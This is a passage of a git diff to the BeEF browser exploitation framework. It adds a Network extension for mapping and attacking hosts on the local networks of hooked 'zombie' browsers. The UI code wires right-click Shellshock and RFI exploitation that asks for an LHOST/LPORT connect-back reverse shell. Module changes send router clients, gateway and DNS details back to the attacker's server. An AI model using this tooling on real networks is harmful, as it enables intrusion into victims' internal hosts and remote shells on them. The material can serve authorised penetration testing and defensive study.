+ {header: 'IP Address', width: 10, sortable: true, dataIndex: 'ip', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}},
+ {header: 'Port', width: 5, sortable: true, dataIndex: 'port', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}},
+ {header: 'Protocol', width: 5, sortable: true, dataIndex: 'proto', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}},
+ {header: 'Type', width: 20, sortable: true, dataIndex: 'type', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}}
+ ],
+
+ listeners: {
+ rowclick: function(grid, rowIndex) {
+ var r = grid.getStore().getAt(rowIndex).data;
+ },
+ containercontextmenu: function(view, e) {
+ e.preventDefault();
+ },
+ contextmenu: function(e, element, options) {
+ e.preventDefault();
+ },
+ rowcontextmenu: function(grid, rowIndex, e) {
+ e.preventDefault();
+ grid.getSelectionModel().selectRow(rowIndex);
+ if (!!grid.rowCtxMenu) {
+ grid.rowCtxMenu.destroy();
+ }
+ var record = grid.selModel.getSelected();
+ var ip = record.get('ip');
+ var port = record.get('port');
+ var proto = record.get('proto');
+ grid.rowCtxMenu = new Ext.menu.Menu({
+ items: [{
+ text: 'Scan ('+ip+':'+port+'/'+proto+')',
+ iconCls: 'network-host-ctxMenu-host',
+ menu: {
+ xtype: 'menu',
+ items: [{
+ text: 'Fingerprint HTTP',
+ iconCls: 'network-host-ctxMenu-fingerprint',
+ handler: function() {
+ var mod_id = get_module_id("internal_network_fingerprinting");
+ commands_statusbar.update_sending('Fingerprinting ' + ip + '...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipRange":ip+'-'+ip, "ports":port}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error sending command');
+ }
+ });
+ }
+ },{
+ text: 'CORS Scan',
+ iconCls: 'network-host-ctxMenu-cors',
+ handler: function() {
+ var mod_id = get_module_id("cross_origin_scanner");
+ commands_statusbar.update_sending('CORS scanning ' + ip + '...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipRange":ip+'-'+ip, "ports":port}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error sending command');
+ }
+ });
+ }
+ },{
+ text: 'Shellshock Scan',
+ iconCls: 'network-host-ctxMenu-shellshock',
+ handler: function() {
+ var mod_id = get_module_id("shell_shock_scanner");
+ var lhost = prompt("Enter local IP for connect back shell:", 'LHOST');
+ if (!lhost) {
+ commands_statusbar.update_fail('Cancelled');
+ return;
+ }
+ var lport = prompt("Enter local port for connect back shell:", 'LPORT');
+ if (!lport) {
+ commands_statusbar.update_fail('Cancelled');
+ return;
+ }
+ alert("Now start your reverse shell handler on " + lhost + ':' + lport);
+ commands_statusbar.update_sending('Shellshock scanning ' + ip + '...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"rproto":proto, "rhost":ip, "rport":port, "lhost":lhost, "lport":lport}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error sending command');
+ }
+ });
+ }
+ },{
+ text: 'RFI Scan',
+ iconCls: 'network-host-ctxMenu-php',
+ handler: function() {
+ var mod_id = get_module_id("rfi_scanner");
+ var lhost = prompt("Enter local IP for connect back shell:", 'LHOST');
+ if (!lhost) {
+ commands_statusbar.update_fail('Cancelled');
+ return;
+ }
+ var lport = prompt("Enter local port for connect back shell:", 'LPORT');
+ if (!lport) {
+ commands_statusbar.update_fail('Cancelled');
+ return;
+ }
+ alert("Now start your reverse shell handler on " + lhost + ':' + lport);
+ commands_statusbar.update_sending('Shellshock scanning ' + ip + '...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"rproto":proto, "rhost":ip, "rport":port, "lhost":lhost, "lport":lport, "payload":"reverse_php"}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error sending command');
+ }
+ });
+ }
+ }]
+ }
+ }]
+ });
+ grid.rowCtxMenu.showAt(e.getXY());
+ },
+ afterrender: function(datagrid) {
+ datagrid.store.reload({ params: {nonce: Ext.get ("nonce").dom.value} });
+ }
+
+ }
+ });
+
+ var services_panel = new Ext.Panel({
+ id: 'network-services-panel-zombie-'+zombie.session,
+ title: 'Services',
+ items:[services_panel_grid],
+ layout: 'fit',
+ listeners: {
+ activate: function(services_panel) {
+ services_panel.items.items[0].store.reload({ params: {nonce: Ext.get ("nonce").dom.value} });
+ }
+ }
+ });
+
+ /*
+ * The Network tab constructor
+ ********************************************/
+ ZombieTab_Network.superclass.constructor.call(this, {
+ id: 'zombie-network-tab-zombie-'+zombie.session,
+ title: 'Network',
+ activeTab: 0,
+ viewConfig: {
+ forceFit: true,
+ stripRows: true,
+ type: 'fit'
+ },
+ items: [hosts_panel, services_panel],
+ bbar: commands_statusbar,
+ listeners: {
+ }
+ });
+
+};
+
+Ext.extend(ZombieTab_Network, Ext.TabPanel, {});
diff --git a/extensions/network/api.rb b/extensions/network/api.rb
new file mode 100644
index 000000000..078f46010
--- /dev/null
+++ b/extensions/network/api.rb
@@ -0,0 +1,24 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+module BeEF
+ module Extension
+ module Network
+
+ module RegisterHttpHandler
+
+ BeEF::API::Registrar.instance.register(BeEF::Extension::Network::RegisterHttpHandler, BeEF::API::Server, 'mount_handler')
+
+ # Mounts the handler for processing network host info.
+ #
+ # @param beef_server [BeEF::Core::Server] HTTP server instance
+ def self.mount_handler(beef_server)
+ beef_server.mount('/api/network', BeEF::Extension::Network::NetworkRest.new)
+ end
+
+ end
+ end
+ end
+end
diff --git a/extensions/network/config.yaml b/extensions/network/config.yaml
new file mode 100644
index 000000000..a85fb53f0
--- /dev/null
+++ b/extensions/network/config.yaml
@@ -0,0 +1,12 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ extension:
+ network:
+ name: 'Network'
+ enable: true
+ authors: ["bcoles"]
+ description: "This extension facilitates interaction with hosts on a zombie browser's local area network(s). It provides a point and click interface for performing a variety of actions including host discovery, fingerprinting and exploitation. Identified network hosts are available in the Network -> Hosts panel. Identified network services are available in the Network -> Services panel. Right-click a host or service for more options."
diff --git a/extensions/network/extension.rb b/extensions/network/extension.rb
new file mode 100644
index 000000000..f76877c19
--- /dev/null
+++ b/extensions/network/extension.rb
@@ -0,0 +1,27 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+module BeEF
+module Extension
+module Network
+
+ extend BeEF::API::Extension
+
+ @short_name = 'network'
+ @full_name = 'Network'
+ @description = "This extension provides a simple interface for interacting with hosts on a zombie browser's local area networks."
+
+end
+end
+end
+
+require 'extensions/network/network'
+require 'extensions/network/models/network_host'
+require 'extensions/network/models/network_service'
+require 'extensions/network/api'
+require 'extensions/network/rest/network'
+
+require 'dm-serializer'
+
diff --git a/extensions/network/models/network_host.rb b/extensions/network/models/network_host.rb
new file mode 100644
index 000000000..0de5ce0d4
--- /dev/null
+++ b/extensions/network/models/network_host.rb
@@ -0,0 +1,31 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+module BeEF
+ module Core
+ module Models
+ #
+ # Table stores each host identified on the zombie browser's network(s)
+ #
+ class NetworkHost
+
+ include DataMapper::Resource
+ storage_names[:default] = 'network_host'
+
+ property :id, Serial
+
+ property :hooked_browser_id, Text, :lazy => false
+ property :ip, Text, :lazy => false
+ property :hostname, String, :lazy => false
+ property :type, String, :lazy => false # proxy, router, gateway, dns, etc
+ property :os, String, :lazy => false
+ property :mac, String, :lazy => false
+ property :cid, String, :lazy => false # command id or 'init'
+
+ end
+
+ end
+ end
+end
diff --git a/extensions/network/models/network_service.rb b/extensions/network/models/network_service.rb
new file mode 100644
index 000000000..c806b2aa1
--- /dev/null
+++ b/extensions/network/models/network_service.rb
@@ -0,0 +1,30 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+module BeEF
+ module Core
+ module Models
+ #
+ # Table stores each open port identified on the zombie browser's network(s)
+ #
+ class NetworkService
+
+ include DataMapper::Resource
+ storage_names[:default] = 'network_service'
+
+ property :id, Serial
+
+ property :hooked_browser_id, Text, :lazy => false
+ property :proto, String, :lazy => false
+ property :ip, Text, :lazy => false
+ property :port, String, :lazy => false
+ property :type, String, :lazy => false
+ property :cid, String, :lazy => false # command id or 'init'
+
+ end
+
+ end
+ end
+end
diff --git a/extensions/network/network.rb b/extensions/network/network.rb
new file mode 100644
index 000000000..9a8eed9e2
--- /dev/null
+++ b/extensions/network/network.rb
@@ -0,0 +1,13 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+module BeEF
+module Extension
+module Network
+
+
+end
+end
+end
diff --git a/extensions/network/rest/network.rb b/extensions/network/rest/network.rb
new file mode 100644
index 000000000..07096aaca
--- /dev/null
+++ b/extensions/network/rest/network.rb
@@ -0,0 +1,169 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+module BeEF
+ module Extension
+ module Network
+
+ # This class handles the routing of RESTful API requests that interact with network services on the zombie's LAN
+ class NetworkRest < BeEF::Core::Router::Router
+
+ # Filters out bad requests before performing any routing
+ before do
+ config = BeEF::Core::Configuration.instance
+ @nh = BeEF::Core::Models::NetworkHost
+ @ns = BeEF::Core::Models::NetworkService
+
+ # Require a valid API token from a valid IP address
+ halt 401 unless params[:token] == config.get('beef.api_token')
+ halt 403 unless BeEF::Core::Rest.permitted_source?(request.ip)
+
+ headers 'Content-Type' => 'application/json; charset=UTF-8',
+ 'Pragma' => 'no-cache',
+ 'Cache-Control' => 'no-cache',
+ 'Expires' => '0'
+ end
+
+ # Returns the entire list of network hosts for all zombies
+ get '/hosts' do
+ begin
+ hosts = @nh.all
+ count = hosts.length
+
+ result = {}
+ result[:count] = count
+ result[:hosts] = hosts.to_json
+ result.to_json
+ rescue StandardError => e
+ print_error "Internal error while retrieving host list (#{e.message})"
+ halt 500
+ end
+ end
+
+ # Returns the entire list of network services for all zombies
+ get '/services' do
+ begin
+ services = @ns.all
+ count = services.length
+
+ result = {}
+ result[:count] = count
+ result[:services] = services.to_json
+ result.to_json
+ rescue StandardError => e
+ print_error "Internal error while retrieving service list (#{e.message})"
+ halt 500
+ end
+ end
+
+ # Returns all hosts given a specific hooked browser id
+ get '/hosts/:id' do
+ begin
+ id = params[:id]
+
+ hosts = @nh.all(:hooked_browser_id => id)
+ count = hosts.length
+
+ result = {}
+ result[:count] = count
+ result[:hosts] = hosts
+ result.to_json
+ rescue InvalidParamError => e
+ print_error e.message
+ halt 400
+ rescue StandardError => e
+ print_error "Internal error while retrieving hosts list for hooked browser with id #{id} (#{e.message})"
+ halt 500
+ end
+ end
+
+ # Returns all services given a specific hooked browser id
+ get '/services/:id' do
+ begin
+ id = params[:id]
+
+ services = @ns.all(:hooked_browser_id => id)
+ count = services.length
+
+ result = {}
+ result[:count] = count
+ result[:services] = services
+ result.to_json
+ rescue InvalidParamError => e
+ print_error e.message
+ halt 400
+ rescue StandardError => e
+ print_error "Internal error while retrieving service list for hooked browser with id #{id} (#{e.message})"
+ halt 500
+ end
+ end
+
+ # Returns a specific host given its id
+ get '/host/:id' do
+ begin
+ id = params[:id]
+
+ host = @nh.all(:id => id)
+ raise InvalidParamError, 'id' if host.nil?
+ halt 404 if host.empty?
+
+ host.to_json
+ rescue InvalidParamError => e
+ print_error e.message
+ halt 400
+ rescue StandardError => e
+ print_error "Internal error while retrieving host with id #{id} (#{e.message})"
+ halt 500
+ end
+ end
+
+ # Returns a specific service given its id
+ get '/service/:id' do
+ begin
+ id = params[:id]
+
+ service = @ns.all(:id => id)
+ raise InvalidParamError, 'id' if service.nil?
+ halt 404 if service.empty?
+
+ service.to_json
+ rescue InvalidParamError => e
+ print_error e.message
+ halt 400
+ rescue StandardError => e
+ print_error "Internal error while retrieving service with id #{id} (#{e.message})"
+ halt 500
+ end
+ end
+
+ # Raised when invalid JSON input is passed to an /api/network handler.
+ class InvalidJsonError < StandardError
+
+ DEFAULT_MESSAGE = 'Invalid JSON input passed to /api/network handler'
+
+ def initialize(message = nil)
+ super(message || DEFAULT_MESSAGE)
+ end
+
+ end
+
+ # Raised when an invalid named parameter is passed to an /api/network handler.
+ class InvalidParamError < StandardError
+
+ DEFAULT_MESSAGE = 'Invalid parameter passed to /api/network handler'
+
+ def initialize(message = nil)
+ str = "Invalid \"%s\" parameter passed to /api/network handler"
+ message = sprintf str, message unless message.nil?
+ super(message)
+ end
+
+ end
+
+ end
+
+ end
+ end
+end
diff --git a/modules/debug/test_cors_request/config.yaml b/modules/debug/test_cors_request/config.yaml
index 977ce84c3..a9e8cf969 100644
--- a/modules/debug/test_cors_request/config.yaml
+++ b/modules/debug/test_cors_request/config.yaml
@@ -11,9 +11,11 @@ beef:
name: "Test CORS Request"
description: "Test the beef.net.cors.request function by retrieving a URL."
authors: ["bcoles"]
+ # http://caniuse.com/cors
target:
working: ["ALL"]
not_working:
+ # CORS is partially supported on IE 8 & 9
IE:
min_ver: 6
max_ver: 7
@@ -22,7 +24,10 @@ beef:
max_ver: 11
C:
min_ver: 1
- max_ver: 2
+ max_ver: 3
S:
min_ver: 1
max_ver: 3
+ F:
+ min_ver: 1
+ max_ver: 3
diff --git a/modules/exploits/rfi_scanner/command.js b/modules/exploits/rfi_scanner/command.js
index 9c2170421..05d6240b7 100644
--- a/modules/exploits/rfi_scanner/command.js
+++ b/modules/exploits/rfi_scanner/command.js
@@ -10,7 +10,7 @@ beef.execute(function() {
var rhost = '<%= @rhost %>';
var rport = '<%= @rport %>';
var base_dir = '<%= @base_dir %>';
- var payload_url = '<%= @payload_url %>/rfi_php_<%= @command_id %>.txt?';
+ var payload_url = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/rfi_php_<%= @command_id %>.txt?';
var target = rproto + '://' + rhost + ':' + rport + base_dir;
var wait = '<%= @wait %>';
diff --git a/modules/exploits/rfi_scanner/config.yaml b/modules/exploits/rfi_scanner/config.yaml
index c0e52770a..5252a4f2b 100644
--- a/modules/exploits/rfi_scanner/config.yaml
+++ b/modules/exploits/rfi_scanner/config.yaml
@@ -9,7 +9,7 @@ beef:
enable: true
category: "Exploits"
name: "RFI Scanner"
- description: "This module scans the specified web server for ~2,500 remote file include vulnerabilities using the fuzzdb RFI list. Many of these vulns require the target to have register_globals enabled in the PHP config.
The scan will take about 10 minutes with the default settings. Successful exploitation results in a reverse shell. Be sure to start your shell handler on the local port specified below.
This module mounts the payload on the BeEF server. Be sure to specify the BeEF server URL below for the target server to connect to."
+ description: "This module scans the specified web server for ~2,500 remote file include vulnerabilities using the fuzzdb RFI list. Many of these vulns require the target to have register_globals enabled in the PHP config.
The scan will take about 10 minutes with the default settings. Successful exploitation results in a reverse shell. Be sure to start your shell handler on the local port specified below."
authors: ["bcoles"]
target:
working: ["ALL"]
diff --git a/modules/exploits/rfi_scanner/module.rb b/modules/exploits/rfi_scanner/module.rb
index 83d5ab4ad..70c22fa64 100644
--- a/modules/exploits/rfi_scanner/module.rb
+++ b/modules/exploits/rfi_scanner/module.rb
@@ -149,11 +149,8 @@ EOS
def self.options
configuration = BeEF::Core::Configuration.instance
- proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
- beef_port = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
lhost = configuration.get("beef.http.public") || configuration.get("beef.http.host")
lhost = "" if lhost == "0.0.0.0"
- url = "#{proto}://#{lhost}:#{beef_port}"
return [
{ 'name' => 'rproto',
'type' => 'combobox',
@@ -173,7 +170,6 @@ EOS
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1' },
{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
{ 'name' => 'base_dir', 'ui_label' => 'Base Directory', 'value' => '/' },
- { 'name' => 'payload_url', 'ui_label' => 'BeEF server URL', 'value' => url },
{ 'name' => 'payload',
'type' => 'combobox',
'ui_label' => 'Payload',
diff --git a/modules/exploits/router/asus_rt_series_get_info/command.js b/modules/exploits/router/asus_rt_series_get_info/command.js
index 41628fc89..389724480 100644
--- a/modules/exploits/router/asus_rt_series_get_info/command.js
+++ b/modules/exploits/router/asus_rt_series_get_info/command.js
@@ -31,7 +31,8 @@ beef.execute(function() {
beef.debug(target_ip + " - gathering info completed");
beef.net.send("<%= @command_url %>", <%= @command_id %>,
- "clients=" + clients +
+ "ip=" + target_ip +
+ "&clients=" + clients +
"&wanip=" + wanip +
"&netmask=" + netmask +
"&gateway=" + gateway +
diff --git a/modules/exploits/router/asus_rt_series_get_info/module.rb b/modules/exploits/router/asus_rt_series_get_info/module.rb
index 0c476a671..d3e58601b 100644
--- a/modules/exploits/router/asus_rt_series_get_info/module.rb
+++ b/modules/exploits/router/asus_rt_series_get_info/module.rb
@@ -13,6 +13,54 @@ class Asus_rt_series_get_info < BeEF::Core::Command
def post_execute
save({'result' => @datastore['result']})
+
+ configuration = BeEF::Core::Configuration.instance
+ if configuration.get("beef.extension.network.enable") == true
+
+ session_id = @datastore['beefhook']
+ cid = @datastore['cid'].to_i
+
+ # log the network hosts
+ if @datastore['results'] =~ /ip=(.+)&clients=(.+)&wanip=(.+)&netmask=(.+)&gateway=(.+)&dns=(.+)/
+ ip = "#{$1}"
+ clients = "#{$2}"
+ wanip = "#{$3}"
+ netmask = "#{$4}"
+ gateway = "#{$5}"
+ dns_servers = "#{$6}"
+
+ if !ip.nil?
+ print_debug("Hooked browser found Asus RT series router [ip: #{ip}]")
+ r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :type => 'Asus Router', :cid => cid)
+ r.save
+ r = BeEF::Core::Models::NetworkService.new(:hooked_browser_id => session_id, :proto => 'http', :ip => ip, :port => 80, :type => 'HTTP Server', :cid => cid)
+ r.save
+ end
+ clients.scan(/([\d\.]+,[:\dA-F]{17})/).flatten.each do |client|
+ next if client.nil?
+ if client.to_s =~ /^([\d\.]+),([:\dA-F]{17})$/
+ ip = $1
+ mac = $2
+ print_debug("Hooked browser found router client [ip: #{ip}, mac: #{mac}]")
+ r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :mac => mac, :cid => cid)
+ r.save
+ end
+ end
+ if !gateway.nil?
+ print_debug("Hooked browser found WAN gateway server [ip: #{gateway}]")
+ r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => gateway, :type => 'WAN Gateway', :cid => cid)
+ r.save
+ end
+ if !dns_servers.nil? && dns_servers =~ /^([\d\. ]+)$/
+ dns_servers.split(/ /).uniq.each do |dns|
+ print_debug("Hooked browser found DNS server [ip: #{dns}]")
+ r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => dns, :type => 'DNS Server', :cid => cid)
+ r.save
+ end
+ end
+ end
+ end
+
end
end
diff --git a/modules/host/get_internal_ip/config.yaml b/modules/host/get_internal_ip/config.yaml
index de8941680..b75085865 100755
--- a/modules/host/get_internal_ip/config.yaml
+++ b/modules/host/get_internal_ip/config.yaml
@@ -8,9 +8,8 @@ beef:
get_internal_ip:
enable: true
category: "Host"
- name: "Get Internal IP"
- description: "Retrieve the internal (behind NAT) IP address of the victim machine using an unsigned Java applet"
+ name: "Get Internal IP (Java)"
+ description: "Retrieve the internal (behind NAT) IP address of the victim machine using an unsigned Java applet.
The browser must have Java enabled and configured to allow execution of unsigned Java applets."
authors: ["antisnatchor"]
target:
- working: ["IE", "FF", "O"]
- user_notify: ["C", "S"]
+ user_notify: ["ALL"]
diff --git a/modules/host/get_internal_ip/module.rb b/modules/host/get_internal_ip/module.rb
index d0c436292..79439b23a 100755
--- a/modules/host/get_internal_ip/module.rb
+++ b/modules/host/get_internal_ip/module.rb
@@ -20,6 +20,22 @@ class Get_internal_ip < BeEF::Core::Command
content['Result'] = @datastore['result']
save content
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/get_internal_ip.class')
+
+ configuration = BeEF::Core::Configuration.instance
+ if configuration.get("beef.extension.network.enable") == true
+
+ session_id = @datastore['beefhook']
+ cid = @datastore['cid'].to_i
+
+ # save the network host
+ if @datastore['results'] =~ /^([\d\.]+)$/
+ ip = $1
+ print_debug("Hooked browser has network interface #{ip}")
+ r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :cid => cid)
+ r.save
+ end
+ end
+
end
end
diff --git a/modules/host/get_internal_ip_webrtc/command.js b/modules/host/get_internal_ip_webrtc/command.js
index 43e00a02d..277591d05 100755
--- a/modules/host/get_internal_ip_webrtc/command.js
+++ b/modules/host/get_internal_ip_webrtc/command.js
@@ -35,7 +35,8 @@ beef.execute(function() {
if (newAddr in addrs) return;
else addrs[newAddr] = true;
var displayAddrs = Object.keys(addrs).filter(function (k) { return addrs[k]; });
- beef.net.send('<%= @command_url %>', <%= @command_id %>, "IP is " + displayAddrs.join(" or perhaps "));
+ beef.debug("Found IPs: "+ displayAddrs.join(","))
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, "IP is " + displayAddrs.join(","));
}
function grepSDP(sdp) {
diff --git a/modules/host/get_internal_ip_webrtc/config.yaml b/modules/host/get_internal_ip_webrtc/config.yaml
index 77dc387df..f0dc77703 100755
--- a/modules/host/get_internal_ip_webrtc/config.yaml
+++ b/modules/host/get_internal_ip_webrtc/config.yaml
@@ -13,4 +13,4 @@ beef:
authors: ["xntrik", "@natevw"]
target:
working: ["C", "FF"]
- unknown: ["All"]
+ not_working: ["ALL"]
diff --git a/modules/host/get_internal_ip_webrtc/module.rb b/modules/host/get_internal_ip_webrtc/module.rb
index fd2c4dddb..7d497d1b7 100755
--- a/modules/host/get_internal_ip_webrtc/module.rb
+++ b/modules/host/get_internal_ip_webrtc/module.rb
@@ -9,6 +9,29 @@ class Get_internal_ip_webrtc < BeEF::Core::Command
content = {}
content['Result'] = @datastore['result']
save content
+
+ configuration = BeEF::Core::Configuration.instance
+ if configuration.get("beef.extension.network.enable") == true
+
+ session_id = @datastore['beefhook']
+ cid = @datastore['cid'].to_i
+
+ # save the network host
+ if @datastore['results'] =~ /IP is ([\d\.,]+)/
+ ips = $1.to_s.split(/,/)
+ if !ips.nil? && !ips.empty?
+ os = BeEF::Core::Models::BrowserDetails.get(session_id, 'OsName')
+ ips.uniq.each do |ip|
+ next unless ip =~ /^[\d\.]+$/
+ next if ip =~ /^0\.0\.0\.0$/
+ print_debug("Hooked browser has network interface #{ip}")
+ r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :os => os, :cid => cid)
+ r.save
+ end
+ end
+ end
+ end
+
end
end
diff --git a/modules/network/cross_origin_scanner/command.js b/modules/network/cross_origin_scanner/command.js
index 440c86b17..382dc5f17 100644
--- a/modules/network/cross_origin_scanner/command.js
+++ b/modules/network/cross_origin_scanner/command.js
@@ -16,22 +16,44 @@ beef.execute(function() {
return;
}
- // set target IP range
- var range = ipRange.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
- if (range == null || range[1] == null) {
- beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied");
- return;
- }
-
- // ipRange will be in the form of 192.168.0.1-192.168.0.254
- // the fourth octet will be iterated.
- // (only C class IP ranges are supported atm)
- ipBounds = ipRange.split('-');
- lowerBound = ipBounds[0].split('.')[3];
- upperBound = ipBounds[1].split('.')[3];
- for (var i = lowerBound; i <= upperBound; i++){
- ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
- ips.push(ipToTest);
+ // set target IP addresses
+ if (ipRange == 'common') {
+ // use default IPs
+ ips = [
+ '192.168.0.1',
+ '192.168.0.100',
+ '192.168.0.254',
+ '192.168.1.1',
+ '192.168.1.100',
+ '192.168.1.254',
+ '10.0.0.1',
+ '10.1.1.1',
+ '192.168.2.1',
+ '192.168.2.254',
+ '192.168.100.1',
+ '192.168.100.254',
+ '192.168.123.1',
+ '192.168.123.254',
+ '192.168.10.1',
+ '192.168.10.254'
+ ];
+ } else {
+ // set target IP range
+ var range = ipRange.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
+ if (range == null || range[1] == null) {
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied");
+ return;
+ }
+ // ipRange will be in the form of 192.168.0.1-192.168.0.254
+ // the fourth octet will be iterated.
+ // (only C class IP ranges are supported atm)
+ ipBounds = ipRange.split('-');
+ lowerBound = ipBounds[0].split('.')[3];
+ upperBound = ipBounds[1].split('.')[3];
+ for (var i = lowerBound; i <= upperBound; i++){
+ ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
+ ips.push(ipToTest);
+ }
}
WorkerQueue = function(frequency) {
diff --git a/modules/network/cross_origin_scanner/config.yaml b/modules/network/cross_origin_scanner/config.yaml
index 77202c349..204067d05 100644
--- a/modules/network/cross_origin_scanner/config.yaml
+++ b/modules/network/cross_origin_scanner/config.yaml
@@ -9,11 +9,13 @@ beef:
enable: true
category: "Network"
name: "Cross-Origin Scanner"
- description: "Scan an IP range for web servers which allow cross-origin requests using CORS. The HTTP response is returned to BeEF."
+ description: "Scan an IP range for web servers which allow cross-origin requests using CORS. The HTTP response is returned to BeEF.
Note: set the IP address range to 'common' to scan a list of common LAN addresses."
authors: ["bcoles"]
+ # http://caniuse.com/cors
target:
working: ["ALL"]
not_working:
+ # CORS is partially supported on IE 8 & 9
IE:
min_ver: 6
max_ver: 7
@@ -22,7 +24,10 @@ beef:
max_ver: 11
C:
min_ver: 1
- max_ver: 2
+ max_ver: 3
S:
min_ver: 1
max_ver: 3
+ F:
+ min_ver: 1
+ max_ver: 3
diff --git a/modules/network/cross_origin_scanner/module.rb b/modules/network/cross_origin_scanner/module.rb
index 0c3902bf0..4a080bc21 100644
--- a/modules/network/cross_origin_scanner/module.rb
+++ b/modules/network/cross_origin_scanner/module.rb
@@ -9,6 +9,25 @@ class Cross_origin_scanner < BeEF::Core::Command
content = {}
content['result'] = @datastore['result']
save content
+
+ configuration = BeEF::Core::Configuration.instance
+ if configuration.get("beef.extension.network.enable") == true
+
+ session_id = @datastore['beefhook']
+ cid = @datastore['cid'].to_i
+
+ # log the network service
+ if @datastore['results'] =~ /ip=(.+)&port=([\d]+)&status/
+ ip = $1
+ port = $2
+ print_debug("Hooked browser found HTTP server #{ip}:#{port}")
+ if !ip.nil? && !port.nil?
+ r = BeEF::Core::Models::NetworkService.new(:hooked_browser_id => session_id, :proto => 'http', :ip => ip, :port => port, :type => 'HTTP Server (CORS)', :cid => cid)
+ r.save
